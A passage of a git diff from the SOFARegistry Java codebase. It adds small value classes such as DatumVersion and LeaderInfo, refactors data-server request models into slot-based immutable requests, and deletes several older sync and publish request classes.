file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.dataserver; + +import java.io.Serializable; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-04 11:54 yuzhi.lyz Exp $ + */ +public final class DatumVersion implements Serializable { + + private final long value; + + public DatumVersion(long v) { + this.value = v; + } + + /** + * Getter method for property value. + * + * @return property value of value + */ + public long getValue() { + return value; + } + + @Override + public String toString() { + return Long.valueOf(value).toString(); + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + DatumVersion that = (DatumVersion) o; + return value == that.value; + } + + @Override + public int hashCode() { + return Long.valueOf(value).hashCode(); + } + + public static DatumVersion of(long v) { + return new DatumVersion(v); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/GetDataRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/GetDataRequest.java index adff9ab73..7ae6cf88e 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/GetDataRequest.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/GetDataRequest.java @@ -16,7 +16,8 @@ */ package com.alipay.sofa.registry.common.model.dataserver; -import java.io.Serializable; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.util.StringFormatter; /** * request to get specific data @@ -24,72 +25,48 @@ * @author qian.lqlq * @version $Id: GetDataRequest.java, v 0.1 2017-12-01 15:48 qian.lqlq Exp $ */ -public class GetDataRequest implements Serializable { +public class GetDataRequest extends AbstractSlotRequest { - private static final long serialVersionUID = 8133437572926931258L; + private static final long serialVersionUID = 8133437572926931258L; - private String dataInfoId; + private final String dataInfoId; - /** - * if datacenter is null, means all datacenters - */ - private String dataCenter; + /** if datacenter is null, means all datacenters */ + private final String dataCenter; - /** - * constructor - */ - public GetDataRequest() { - } + public GetDataRequest( + ProcessId sessionProcessId, String dataInfoId, String dataCenter, int slotId) { + super(slotId, sessionProcessId); + this.dataInfoId = dataInfoId; + this.dataCenter = dataCenter; + } - /** - * constructor - * @param dataInfoId - * @param dataCenter - */ - public GetDataRequest(String dataInfoId, String dataCenter) { - this.dataInfoId = dataInfoId; - this.dataCenter = dataCenter; - } + /** + * Getter method for property dataInfoId. + * + * @return property value of dataInfoId + */ + public String getDataInfoId() { + return dataInfoId; + } - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = dataInfoId; - } - - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; - } - - /** - * Setter method for property dataCenter. - * - * @param dataCenter value to be assigned to property dataCenter - */ - public void setDataCenter(String dataCenter) { - this.dataCenter = dataCenter; - } - - @Override - public String toString() { - return new StringBuilder("[GetDataRequest] dataCenter=").append(this.dataCenter) - .append(", dataInfoId=").append(this.dataInfoId).toString(); - } + @Override + public String toString() { + return StringFormatter.format( + "GetData:{},{},{},{},{}", + dataInfoId, + dataCenter, + getSlotId(), + getSlotLeaderEpoch(), + getSlotTableEpoch()); + } } diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/GetDataVersionRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/GetDataVersionRequest.java index 3122f07da..c092cc57c 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/GetDataVersionRequest.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/GetDataVersionRequest.java @@ -16,8 +16,11 @@ */ package com.alipay.sofa.registry.common.model.dataserver; -import java.io.Serializable; -import java.util.List; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.collect.Maps; +import java.util.Collections; +import java.util.Map; /** * request to get versions of specific data @@ -25,42 +28,41 @@ * @author qian.lqlq * @version $Id: GetDataVersionRequest.java, v 0.1 2017-12-01 下午4:58 qian.lqlq Exp $ */ -public class GetDataVersionRequest implements Serializable { +public class GetDataVersionRequest extends AbstractSlotRequest { - private static final long serialVersionUID = 8942977145684175886L; + private static final long serialVersionUID = 8942977145684175886L; - private List dataInfoIds; + private final String dataCenter; + // dataInfoId:max(push.version) + private final Map interests; - /** - * constructor - */ - public GetDataVersionRequest() { - } + /** constructor */ + public GetDataVersionRequest( + String dataCenter, + ProcessId sessionProcessId, + int slotId, + Map interests) { + super(slotId, sessionProcessId); + this.dataCenter = dataCenter; + this.interests = Collections.unmodifiableMap(Maps.newHashMap(interests)); + } - /** - * Getter method for property dataInfoIds. - * - * @return property value of dataInfoIds - */ - public List getDataInfoIds() { - return dataInfoIds; - } + public Map getInterests() { + return interests; + } - /** - * Setter method for property dataInfoIds. - * - * @param dataInfoIds value to be assigned to property dataInfoIds - */ - public void setDataInfoIds(List dataInfoIds) { - this.dataInfoIds = dataInfoIds; - } + public String getDataCenter() { + return dataCenter; + } - @Override - public String toString() { - StringBuilder sb = new StringBuilder("[GetDataVersionRequest] dataInfoIds="); - if (dataInfoIds != null) { - sb.append(this.dataInfoIds.size()); - } - return sb.toString(); - } -} \ No newline at end of file + @Override + public String toString() { + return StringFormatter.format( + "GetDataVer:{},{},{},{},interests={}", + getSlotId(), + dataCenter, + getSlotLeaderEpoch(), + getSlotTableEpoch(), + interests.size()); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/NotifyDataSyncRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/NotifyDataSyncRequest.java deleted file mode 100644 index 39f059651..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/NotifyDataSyncRequest.java +++ /dev/null @@ -1,137 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.dataserver; - -import java.io.Serializable; - -/** - * - * @author qian.lqlq - * @version $Id: NotifyDataSyncRequest.java, v 0.1 2018-03-24 14:33 qian.lqlq Exp $ - */ -public class NotifyDataSyncRequest implements Serializable { - - private static final long serialVersionUID = 6855281580053659076L; - - private String dataInfoId; - - private String dataCenter; - - private long version; - - private String dataSourceType; - - /** - * constructor - */ - public NotifyDataSyncRequest() { - } - - /** - * constructor - * @param dataInfoId - * @param dataCenter - * @param version - * @param dataSourceType - */ - public NotifyDataSyncRequest(String dataInfoId, String dataCenter, long version, - String dataSourceType) { - this.dataInfoId = dataInfoId; - this.dataCenter = dataCenter; - this.version = version; - this.dataSourceType = dataSourceType; - } - - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = dataInfoId; - } - - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; - } - - /** - * Setter method for property dataCenter. - * - * @param dataCenter value to be assigned to property dataCenter - */ - public void setDataCenter(String dataCenter) { - this.dataCenter = dataCenter; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(long version) { - this.version = version; - } - - /** - * Getter method for property dataSourceType. - * - * @return property value of dataSourceType - */ - public String getDataSourceType() { - return dataSourceType; - } - - /** - * Setter method for property dataSourceType. - * - * @param dataSourceType value to be assigned to property dataSourceType - */ - public void setDataSourceType(String dataSourceType) { - this.dataSourceType = dataSourceType; - } - - @Override - public String toString() { - return new StringBuilder("[NotifyDataSyncRequest] dataInfoId=").append(this.dataInfoId) - .append(", dataCenter=").append(this.dataCenter).append(", version=") - .append(this.version).append(", dataSourceType=").append(dataSourceType).toString(); - } -} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/NotifyFetchDatumRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/NotifyFetchDatumRequest.java deleted file mode 100644 index c33b123be..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/NotifyFetchDatumRequest.java +++ /dev/null @@ -1,110 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.dataserver; - -import java.io.Serializable; -import java.util.HashMap; -import java.util.Map; - -/** - * - * @author qian.lqlq - * @version $Id: NotifyFetchDatumRequest.java, v 0.1 2018-04-29 15:07 qian.lqlq Exp $ - */ -public class NotifyFetchDatumRequest implements Serializable { - - private static final long serialVersionUID = 410885158191567105L; - - private Map> dataVersionMap = new HashMap<>(); - - private String ip; - - private long changeVersion; - - /** - * construtor - * @param dataVersionMap - * @param ip - * @param changeVersion - */ - public NotifyFetchDatumRequest(Map> dataVersionMap, String ip, - long changeVersion) { - this.dataVersionMap = dataVersionMap; - this.ip = ip; - this.changeVersion = changeVersion; - } - - /** - * Getter method for property dataVersionMap. - * - * @return property value of dataVersionMap - */ - public Map> getDataVersionMap() { - return dataVersionMap; - } - - /** - * Setter method for property dataVersionMap. - * - * @param dataVersionMap value to be assigned to property dataVersionMap - */ - public void setDataVersionMap(Map> dataVersionMap) { - this.dataVersionMap = dataVersionMap; - } - - /** - * Getter method for property ip. - * - * @return property value of ip - */ - public String getIp() { - return ip; - } - - /** - * Setter method for property ip. - * - * @param ip value to be assigned to property ip - */ - public void setIp(String ip) { - this.ip = ip; - } - - /** - * Getter method for property changeVersion. - * - * @return property value of changeVersion - */ - public long getChangeVersion() { - return changeVersion; - } - - /** - * Setter method for property changeVersion. - * - * @param changeVersion value to be assigned to property changeVersion - */ - public void setChangeVersion(long changeVersion) { - this.changeVersion = changeVersion; - } - - @Override - public String toString() { - return new StringBuilder("[NotifyFetchDatumRequest] ip=").append(ip) - .append(", changeVersion=").append(changeVersion).toString(); - } -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/NotifyOnlineRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/NotifyOnlineRequest.java deleted file mode 100644 index 72472b6e8..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/NotifyOnlineRequest.java +++ /dev/null @@ -1,67 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.dataserver; - -import java.io.Serializable; - -/** - * - * @author qian.lqlq - * @version $Id: NotifyOnlineRequest.java, v 0.1 2018-04-29 14:34 qian.lqlq Exp $ - */ -public class NotifyOnlineRequest implements Serializable { - - private static final long serialVersionUID = 934663828370697909L; - - private String ip; - - private long version; - - /** - * construtor - * @param ip - * @param version - */ - public NotifyOnlineRequest(String ip, long version) { - this.ip = ip; - this.version = version; - } - - /** - * Getter method for property ip. - * - * @return property value of ip - */ - public String getIp() { - return ip; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public long getVersion() { - return version; - } - - @Override - public String toString() { - return new StringBuilder("[NotifyOnlineRequest] ip=").append(ip).append(", version=") - .append(version).toString(); - } -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/PublishDataRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/PublishDataRequest.java deleted file mode 100644 index dfc244f74..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/PublishDataRequest.java +++ /dev/null @@ -1,85 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.dataserver; - -import com.alipay.sofa.registry.common.model.store.Publisher; - -import java.io.Serializable; - -/** - * request to register publish data - * - * @author qian.lqlq - * @version $Id: PublishDataRequest.java, v 0.1 2017-12-06 15:56 qian.lqlq Exp $ - */ -public class PublishDataRequest implements Serializable { - - private static final long serialVersionUID = 3900211443485220361L; - - private Publisher publisher; - - private String sessionServerProcessId; - - /** - * Getter method for property publisher. - * - * @return property value of publisher - */ - public Publisher getPublisher() { - return publisher; - } - - /** - * Setter method for property publisher. - * - * @param publisher value to be assigned to property publisher - */ - public void setPublisher(Publisher publisher) { - this.publisher = publisher; - } - - /** - * Getter method for property sessionServerProcessId. - * - * @return property value of sessionServerProcessId - */ - public String getSessionServerProcessId() { - return sessionServerProcessId; - } - - /** - * Setter method for property sessionServerProcessId. - * - * @param sessionServerProcessId value to be assigned to property sessionServerProcessId - */ - public void setSessionServerProcessId(String sessionServerProcessId) { - this.sessionServerProcessId = sessionServerProcessId; - } - - @Override - public String toString() { - StringBuilder sb = new StringBuilder("[PublishDataRequest] sessionServerProcessId=") - .append(sessionServerProcessId); - sb.append(", dataInfoId="); - if (publisher != null) { - sb.append(publisher.getDataInfoId()); - sb.append(", sourceAddress=").append(publisher.getSourceAddress()); - sb.append(", registerId=").append(publisher.getRegisterId()); - } - return sb.toString(); - } -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/SessionServerRegisterRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/SessionServerRegisterRequest.java deleted file mode 100644 index 16f00f56b..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/SessionServerRegisterRequest.java +++ /dev/null @@ -1,77 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.dataserver; - -import java.io.Serializable; -import java.util.Set; - -/** - * - * @author qian.lqlq - * @version $Id: SessionServerRegisterRequest.java, v 0.1 2018-04-14 17:31 qian.lqlq Exp $ - */ -public class SessionServerRegisterRequest implements Serializable { - - private static final long serialVersionUID = 4872633119038341583L; - - private String processId; - - private Set clientHosts; - - /** - * constructor - * @param processId - * @param clientHosts - */ - public SessionServerRegisterRequest(String processId, Set clientHosts) { - this.processId = processId; - this.clientHosts = clientHosts; - } - - /** - * Getter method for property processId. - * - * @return property value of processId - */ - public String getProcessId() { - return processId; - } - - /** - * Setter method for property processId. - * - * @param processId value to be assigned to property processId - */ - public void setProcessId(String processId) { - this.processId = processId; - } - - /** - * Getter method for property clientHosts. - * - * @return property value of clientHosts - */ - public Set getClientHosts() { - return clientHosts; - } - - @Override - public String toString() { - return new StringBuilder("[SessionServerRegisterRequest] processId=") - .append(this.processId).append(", clientHosts=").append(this.clientHosts).toString(); - } -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/SyncData.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/SyncData.java deleted file mode 100644 index f1eab66a2..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/SyncData.java +++ /dev/null @@ -1,135 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.dataserver; - -import java.io.Serializable; -import java.util.Collection; - -/** - * - * @author shangyu.wh - * @version $Id: SyncData.java, v 0.1 2018-03-07 17:57 shangyu.wh Exp $ - */ -public class SyncData implements Serializable { - - private String dataInfoId; - - private String dataCenter; - - private Collection datums; - - private boolean wholeDataTag; - - /** - * construtor - * @param dataInfoId - * @param dataCenter - * @param wholeDataTag - * @param datums - */ - public SyncData(String dataInfoId, String dataCenter, boolean wholeDataTag, - Collection datums) { - this.dataInfoId = dataInfoId; - this.dataCenter = dataCenter; - this.wholeDataTag = wholeDataTag; - this.datums = datums; - } - - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = dataInfoId; - } - - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; - } - - /** - * Setter method for property dataCenter. - * - * @param dataCenter value to be assigned to property dataCenter - */ - public void setDataCenter(String dataCenter) { - this.dataCenter = dataCenter; - } - - /** - * Getter method for property datums. - * - * @return property value of datums - */ - public Collection getDatums() { - return datums; - } - - /** - * Setter method for property datums. - * - * @param datums value to be assigned to property datums - */ - public void setDatums(Collection datums) { - this.datums = datums; - } - - /** - * Getter method for property wholeDataTag. - * - * @return property value of wholeDataTag - */ - public boolean getWholeDataTag() { - return wholeDataTag; - } - - /** - * Setter method for property wholeDataTag. - * - * @param wholeDataTag value to be assigned to property wholeDataTag - */ - public void setWholeDataTag(boolean wholeDataTag) { - this.wholeDataTag = wholeDataTag; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("SyncData{"); - sb.append("dataInfoId='").append(dataInfoId).append('\''); - sb.append(", dataCenter='").append(dataCenter).append('\''); - sb.append(", wholeDataTag=").append(wholeDataTag); - sb.append(", datumsSize=").append(datums != null ? String.valueOf(datums.size()) : ""); - sb.append('}'); - return sb.toString(); - } - -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/SyncDataRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/SyncDataRequest.java deleted file mode 100644 index 98a44f838..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/SyncDataRequest.java +++ /dev/null @@ -1,134 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.dataserver; - -import java.io.Serializable; - -/** - * request to sync data from dataserver in other dataCenter - * - * @author qian.lqlq - * @version $Id: SyncDataRequest.java, v 0.1 2018-03-07 15:22 qian.lqlq Exp $ - */ -public class SyncDataRequest implements Serializable { - - private static final long serialVersionUID = 7229539333106031495L; - - private String dataInfoId; - - private String dataCenter; - - private String dataSourceType; - - /** - * be null when dataInfoId not exist in local datumCache - */ - private Long version; - - /** - * construtor - * @param dataInfoId - * @param dataCenter - * @param version - * @param dataSourceType - */ - public SyncDataRequest(String dataInfoId, String dataCenter, Long version, String dataSourceType) { - this.dataInfoId = dataInfoId; - this.dataCenter = dataCenter; - this.version = version; - this.dataSourceType = dataSourceType; - } - - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = dataInfoId; - } - - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; - } - - /** - * Setter method for property dataCenter. - * - * @param dataCenter value to be assigned to property dataCenter - */ - public void setDataCenter(String dataCenter) { - this.dataCenter = dataCenter; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } - - /** - * Getter method for property dataSourceType. - * - * @return property value of dataSourceType - */ - public String getDataSourceType() { - return dataSourceType; - } - - /** - * Setter method for property dataSourceType. - * - * @param dataSourceType value to be assigned to property dataSourceType - */ - public void setDataSourceType(String dataSourceType) { - this.dataSourceType = dataSourceType; - } - - @Override - public String toString() { - return new StringBuilder("[SyncDataRequest] dataInfoId=").append(dataInfoId) - .append(", dataCenter=").append(dataCenter).append(", version=").append(version) - .toString(); - } -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/UnPublishDataRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/UnPublishDataRequest.java deleted file mode 100644 index cfa8554ac..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/UnPublishDataRequest.java +++ /dev/null @@ -1,115 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.dataserver; - -import java.io.Serializable; - -/** - * request to unPublish data - * - * @author qian.lqlq - * @version $Id: UnPublishDataRequest.java, v 0.1 2017-12-01 15:48 qian.lqlq Exp $ - */ -public class UnPublishDataRequest implements Serializable { - - private static final long serialVersionUID = 4344115202203415801L; - - private String dataInfoId; - - private String registerId; - - private long registerTimestamp; - - /** - * constructor - */ - public UnPublishDataRequest() { - } - - /** - * construtor - * @param dataInfoId - * @param registerId - * @param registerTimestamp - */ - public UnPublishDataRequest(String dataInfoId, String registerId, long registerTimestamp) { - this.dataInfoId = dataInfoId; - this.registerId = registerId; - this.registerTimestamp = registerTimestamp; - } - - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = dataInfoId; - } - - /** - * Getter method for property registerId. - * - * @return property value of registerId - */ - public String getRegisterId() { - return registerId; - } - - /** - * Setter method for property registerId. - * - * @param registerId value to be assigned to property registerId - */ - public void setRegisterId(String registerId) { - this.registerId = registerId; - } - - /** - * Getter method for property registerTimestamp. - * - * @return property value of registerTimestamp - */ - public long getRegisterTimestamp() { - return registerTimestamp; - } - - /** - * Setter method for property registerTimestamp. - * - * @param registerTimestamp value to be assigned to property registerTimestamp - */ - public void setRegisterTimestamp(long registerTimestamp) { - this.registerTimestamp = registerTimestamp; - } - - @Override - public String toString() { - return new StringBuilder("[UnPublishDataRequest] dataInfoId=").append(this.dataInfoId) - .append(", registerId=").append(this.registerId).append(", registerTimestamp=") - .append(this.registerTimestamp).toString(); - } -} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/elector/LeaderInfo.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/elector/LeaderInfo.java new file mode 100644 index 000000000..81adbc69f --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/elector/LeaderInfo.java @@ -0,0 +1,73 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.elector; + +import java.io.Serializable; +import java.util.Objects; + +/** + * @author xiaojian.xj + * @version $Id: LeaderInfo.java, v 0.1 2021年03月22日 10:27 xiaojian.xj Exp $ + */ +public class LeaderInfo implements Serializable { + + private static final long serialVersionUID = -1851792034078553148L; + private final long epoch; + + private final String leader; + + public LeaderInfo(long epoch, String leader) { + this.leader = leader; + this.epoch = epoch; + } + + /** + * Getter method for property epoch. + * + * @return property value of epoch + */ + public long getEpoch() { + return epoch; + } + + /** + * Getter method for property leader. + * + * @return property value of leader + */ + public String getLeader() { + return leader; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + LeaderInfo that = (LeaderInfo) o; + return epoch == that.epoch && Objects.equals(leader, that.leader); + } + + @Override + public int hashCode() { + return Objects.hash(epoch, leader); + } + + @Override + public String toString() { + return "LeaderInfo{" + "epoch=" + epoch + ", leader='" + leader + '\'' + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataCenterNodes.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataCenterNodes.java index 23097f494..65ef74e8e 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataCenterNodes.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/DataCenterNodes.java @@ -18,100 +18,80 @@ import com.alipay.sofa.registry.common.model.Node; import com.alipay.sofa.registry.common.model.Node.NodeType; - import java.io.Serializable; import java.util.Map; /** - * * @author shangyu.wh * @version $Id: DataCenterNodes.java, v 0.1 2018-02-12 11:06 shangyu.wh Exp $ */ public class DataCenterNodes implements Serializable { - private final NodeType nodeType; - - private Long version; - - private String dataCenterId; - - private Map nodes; - - /** - * constructor - * @param nodeType - * @param version - * @param dataCenterId - */ - public DataCenterNodes(NodeType nodeType, Long version, String dataCenterId) { - this.nodeType = nodeType; - this.version = version; - this.dataCenterId = dataCenterId; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } - - /** - * Getter method for property dataCenterId. - * - * @return property value of dataCenterId - */ - public String getDataCenterId() { - return dataCenterId; - } - - /** - * Setter method for property dataCenterId. - * - * @param dataCenterId value to be assigned to property dataCenterId - */ - public void setDataCenterId(String dataCenterId) { - this.dataCenterId = dataCenterId; - } - - /** - * Getter method for property nodes. - * - * @return property value of nodes - */ - public Map getNodes() { - return nodes; - } - - /** - * Setter method for property nodes. - * - * @param nodes value to be assigned to property nodes - */ - public void setNodes(Map nodes) { - this.nodes = nodes; - } - - @Override - public String toString() { - final 